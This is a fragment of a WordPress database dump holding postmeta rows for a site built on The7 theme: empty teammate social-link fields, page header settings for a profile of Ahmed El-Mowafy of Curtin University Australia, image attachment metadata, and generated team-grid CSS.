(23189,3460,'_dt_teammate_options_linkedin',''),
(23190,3460,'_dt_teammate_options_vimeo',''),
(23191,3460,'_dt_teammate_options_tumbler',''),
(23192,3460,'_dt_teammate_options_pinterest',''),
(23193,3460,'_dt_teammate_options_devian',''),
(23194,3460,'_dt_teammate_options_skype',''),
(23195,3460,'_dt_teammate_options_github',''),
(23196,3460,'_dt_teammate_options_instagram',''),
(23197,3460,'_dt_teammate_options_stumbleupon',''),
(23198,3460,'_dt_teammate_options_behance',''),
(23199,3460,'_dt_teammate_options_px-500',''),
(23200,3460,'_dt_teammate_options_tripedvisor',''),
(23201,3460,'_dt_teammate_options_vk',''),
(23202,3460,'_dt_teammate_options_foursquare',''),
(23203,3460,'_dt_teammate_options_xing',''),
(23204,3460,'_dt_teammate_options_weibo',''),
(23205,3460,'_dt_teammate_options_odnoklassniki',''),
(23206,3460,'_dt_teammate_options_research-gate',''),
(23207,3460,'_dt_teammate_options_yelp',''),
(23208,3460,'_dt_teammate_options_blogger',''),
(23209,3460,'_dt_teammate_options_soundcloud',''),
(23210,3460,'_dt_teammate_options_viber',''),
(23211,3460,'_dt_teammate_options_whatsapp',''),
(23212,3460,'_dt_teammate_options_reddit',''),
(23213,3460,'_dt_teammate_options_snapchat',''),
(23214,3460,'_dt_teammate_options_telegram',''),
(23215,3460,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(23216,3462,'_edit_lock','1671199638:1'),
(23217,3463,'_wp_attached_file','2022/12/w263.jpg'),
(23218,3463,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:284;s:6:\"height\";i:427;s:4:\"file\";s:16:\"2022/12/w263.jpg\";s:8:\"filesize\";i:24661;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"w263-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9005;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w263-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4580;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(23219,3462,'_thumbnail_id','3463'),
(23220,3462,'_edit_last','1'),
(23221,3462,'_dt_sidebar_position','disabled'),
(23222,3462,'_dt_sidebar_widgetarea_id','sidebar_1'),
(23223,3462,'_dt_sidebar_hide_on_mobile','0'),
(23224,3462,'_dt_footer_show','1'),
(23225,3462,'_dt_footer_widgetarea_id','sidebar_2'),
(23226,3462,'_dt_footer_hide_on_mobile','0'),
(23227,3462,'_dt_header_title','fancy'),
(23228,3462,'_dt_header_background','normal'),
(23229,3462,'_dt_header_background_below_slideshow','disabled'),
(23230,3462,'_dt_header_transparent_bg_color_scheme','light'),
(23231,3462,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(23232,3462,'_dt_header_transparent_top_bar_bg_opacity','25'),
(23233,3462,'_dt_header_transparent_bg_color','#000000'),
(23234,3462,'_dt_header_transparent_bg_opacity','50'),
(23235,3462,'_dt_header_disabled_background','normal'),
(23236,3462,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(23237,3462,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(23238,3462,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(23239,3462,'_dt_header_disabled_transparent_bg_color','#000000'),
(23240,3462,'_dt_header_disabled_transparent_bg_opacity','50'),
(23241,3462,'_dt_page_overrides_top_margin',''),
(23242,3462,'_dt_page_overrides_right_margin',''),
(23243,3462,'_dt_page_overrides_bottom_margin',''),
(23244,3462,'_dt_page_overrides_left_margin',''),
(23245,3462,'_dt_mobile_page_padding_top',''),
(23246,3462,'_dt_mobile_page_padding_right',''),
(23247,3462,'_dt_mobile_page_padding_bottom',''),
(23248,3462,'_dt_mobile_page_padding_left',''),
(23249,3462,'_dt_fancy_header_layout_heading',''),
(23250,3462,'_dt_fancy_header_title_aligment','center'),
(23251,3462,'_dt_fancy_header_height','300'),
(23252,3462,'_dt_fancy_header_padding-top','0px'),
(23253,3462,'_dt_fancy_header_padding-bottom','0px'),
(23254,3462,'_dt_fancy_header_breadcrumbs_heading',''),
(23255,3462,'_dt_fancy_header_breadcrumbs','enabled'),
(23256,3462,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(23257,3462,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(23258,3462,'_dt_fancy_header_title_heading',''),
(23259,3462,'_dt_fancy_header_title_mode','custom'),
(23260,3462,'_dt_fancy_header_title','Ahmed El-Mowafy'),
(23261,3462,'_dt_fancy_header_title_font_size','30'),
(23262,3462,'_dt_fancy_header_title_line_height','36'),
(23263,3462,'_dt_fancy_header_text_transform','none'),
(23264,3462,'_dt_fancy_header_title_color_mode','color'),
(23265,3462,'_dt_fancy_header_title_color','#ffffff'),
(23266,3462,'_dt_fancy_header_subtitle_heading',''),
(23267,3462,'_dt_fancy_header_subtitle','Curtin University Australia'),
(23268,3462,'_dt_fancy_header_subtitle_font_size','18'),
(23269,3462,'_dt_fancy_header_subtitle_line_height','26'),
(23270,3462,'_dt_fancy_header_subtitle_text_transform','none'),
(23271,3462,'_dt_fancy_header_subtitle_color_mode','color'),
(23272,3462,'_dt_fancy_header_subtitle_color','#ffffff'),
(23273,3462,'_dt_fancy_header_bg_heading',''),
(23274,3462,'_dt_fancy_header_bg_color','#222222'),
(23275,3462,'_dt_fancy_header_bg_image_origin','custom'),
(23276,3462,'_dt_fancy_header_bg_image','a:0:{}'),
(23277,3462,'_dt_fancy_header_bg_repeat','no-repeat'),
(23278,3462,'_dt_fancy_header_bg_position_x','center'),
(23279,3462,'_dt_fancy_header_bg_position_y','center'),
(23280,3462,'_dt_fancy_header_bg_fullscreen','1'),
(23281,3462,'_dt_fancy_header_bg_overlay','0'),
(23282,3462,'_dt_fancy_header_overlay_color','#000'),
(23283,3462,'_dt_fancy_header_bg_overlay_opacity','50'),
(23284,3462,'_dt_fancy_header_scroll_effect','default'),
(23285,3462,'_dt_fancy_header_bg_parallax','0.5'),
(23286,3462,'_dt_fancy_header_responsiveness_heading',''),
(23287,3462,'_dt_fancy_header_responsiveness','disabled'),
(23288,3462,'_dt_fancy_header_responsiveness_switch','778px'),
(23289,3462,'_dt_fancy_header_responsive_height','70'),
(23290,3462,'_dt_fancy_header_responsive_font_size','30'),
(23291,3462,'_dt_fancy_header_responsive_title_line_height','38'),
(23292,3462,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(23293,3462,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(23294,3462,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(23295,3462,'_dt_teammate_options_go_to_single','1'),
(23296,3462,'_dt_teammate_options_position',''),
(23297,3462,'_dt_teammate_options_website',''),
(23298,3462,'_dt_teammate_options_mail',''),
(23299,3462,'_dt_teammate_options_facebook',''),
(23300,3462,'_dt_teammate_options_twitter',''),
(23301,3462,'_dt_teammate_options_dribbble',''),
(23302,3462,'_dt_teammate_options_you-tube',''),
(23303,3462,'_dt_teammate_options_rss',''),
(23304,3462,'_dt_teammate_options_delicious',''),
(23305,3462,'_dt_teammate_options_flickr',''),
(23306,3462,'_dt_teammate_options_lastfm',''),
(23307,3462,'_dt_teammate_options_linkedin',''),
(23308,3462,'_dt_teammate_options_vimeo',''),
(23309,3462,'_dt_teammate_options_tumbler',''),
(23310,3462,'_dt_teammate_options_pinterest',''),
(23311,3462,'_dt_teammate_options_devian',''),
(23312,3462,'_dt_teammate_options_skype',''),
(23313,3462,'_dt_teammate_options_github',''),
(23314,3462,'_dt_teammate_options_instagram',''),
(23315,3462,'_dt_teammate_options_stumbleupon',''),
(23316,3462,'_dt_teammate_options_behance',''),
(23317,3462,'_dt_teammate_options_px-500',''),
(23318,3462,'_dt_teammate_options_tripedvisor',''),
(23319,3462,'_dt_teammate_options_vk',''),
(23320,3462,'_dt_teammate_options_foursquare',''),
(23321,3462,'_dt_teammate_options_xing',''),
(23322,3462,'_dt_teammate_options_weibo',''),
(23323,3462,'_dt_teammate_options_odnoklassniki',''),
(23324,3462,'_dt_teammate_options_research-gate',''),
(23325,3462,'_dt_teammate_options_yelp',''),
(23326,3462,'_dt_teammate_options_blogger',''),
(23327,3462,'_dt_teammate_options_soundcloud',''),
(23328,3462,'_dt_teammate_options_viber',''),
(23329,3462,'_dt_teammate_options_whatsapp',''),
(23330,3462,'_dt_teammate_options_reddit',''),
(23331,3462,'_dt_teammate_options_snapchat',''),
(23332,3462,'_dt_teammate_options_telegram',''),
(23333,3462,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(23335,3464,'_wp_attached_file','2022/12/w251.jpg'),
(23336,3464,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:16:\"2022/12/w251.jpg\";s:8:\"filesize\";i:36302;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"w251-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13745;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w251-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5420;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"w251-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27309;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(23337,3455,'_thumbnail_id','3464'),
(23338,3465,'_wp_attached_file','2022/12/w25m2.jpg'),
(23339,3465,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1205;s:6:\"height\";i:889;s:4:\"file\";s:17:\"2022/12/w25m2.jpg\";s:8:\"filesize\";i:336994;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"w25m2-300x221.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:221;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23083;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"w25m2-1024x755.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:755;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:171240;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"w25m2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9673;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"w25m2-768x567.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:567;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109257;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"w25m2-500x369.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:369;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54539;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:17:\"w25m2-800x590.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:590;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115361;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(23340,3449,'the7_shortcodes_dynamic_css','a:1:{s:32:\"77b4c5d26630621538e097d1a9f0d683\";s:6837:\".dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683  .team-media img {\n  max-width: 120px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .dt-css-grid .team-media img {\n  width: 120px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-77b4c5d26630621538e097d1a9f0d683.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(23341,3480,'_wp_attached_file','2022/12/w26m2.jpg'),
(23342,3480,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:738;s:6:\"height\";i:405;s:4:\"file\";s:17:\"2022/12/w26m2.jpg\";s:8:\"filesize\";i:80600;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"w26m2-300x165.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14068;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"w26m2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7427;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"w26m2-500x274.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30686;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(23343,3452,'the7_shortcodes_dynamic_css','a:2:{s:32:\"30414b27d2baf5bcfb60c7974c11313c\";s:6837:\".dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c  .team-media img {\n  max-width: 120px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .dt-css-grid .team-media img {\n  width: 120px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: 